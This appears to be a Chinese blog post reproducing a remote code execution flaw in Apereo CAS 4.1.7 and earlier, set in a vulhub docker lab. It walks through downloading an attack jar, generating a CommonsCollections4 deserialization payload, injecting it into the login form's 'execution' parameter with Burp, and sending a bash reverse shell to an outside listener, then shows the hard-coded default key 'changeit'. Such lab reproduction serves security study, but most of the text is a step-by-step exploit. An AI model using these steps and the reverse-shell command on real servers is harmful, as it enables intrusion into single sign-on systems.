漏洞复现-apereo-cas-4.1-rce

 
 
 

0x00 实验环境

攻击机:Win 10

靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场)

 

0x01 影响版本

影响版本 Apereo CAS <= 4.1.7(Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。)

 

0x02 漏洞复现

(1)访问页面:(其实这个页面并不常见,大部分应该都是有修改过,挖漏洞也很少遇到这类,版本为4.1.5,存在该漏洞)

 

(2)下载命令执行工具生成payload:

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "mkdir 123"

 

(3)上面的即为我们的payload了,直接在登录页面进行抓包,修改命令为payload即可:

 

(4)发送至repeater模块,修改参数“execution”为生成的payload

可以发现肉鸡生成了一个123的文件夹,这个工具没法直接将结果返回过来,因此大部分情况都是用来反弹shell。

 

(5)反弹shell的命令:

/bin/bash -i > /dev/tcp/xx.xx.xx.xx/8899 0<&1 2>&1

这里不能直接放在里面,需要编码一下命令才行,复现久了就能习惯性的知道怎么做了:

 

 在网站:http://www.jackson-t.ca/runtime-exec-payloads.html

转换一下命令的编码格式,然后再去生成payload

 

然后直接执行命令,在自己的攻击机vps上监听8899,burp发包即可:

 

发一下包就能获取到反弹回来的shell:

 

0x04 漏洞原理

Webflow中使用了默认密钥changeit

public class EncryptedTranscoder implements Transcoder {
    private CipherBean cipherBean;
    private boolean compression = true;

    public EncryptedTranscoder() throws IOException {
        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
        bufferedBlockCipherBean.setKeyAlias("aes128");
        bufferedBlockCipherBean.setKeyPassword("changeit");
        bufferedBlockCipherBean.setNonce(new RBGNonce());
        this.setCipherBean(bufferedBlockCipherBean);
    }
posted @ 2021-04-12 16:57  铺哩  阅读(1242)  评论(0编辑  收藏  举报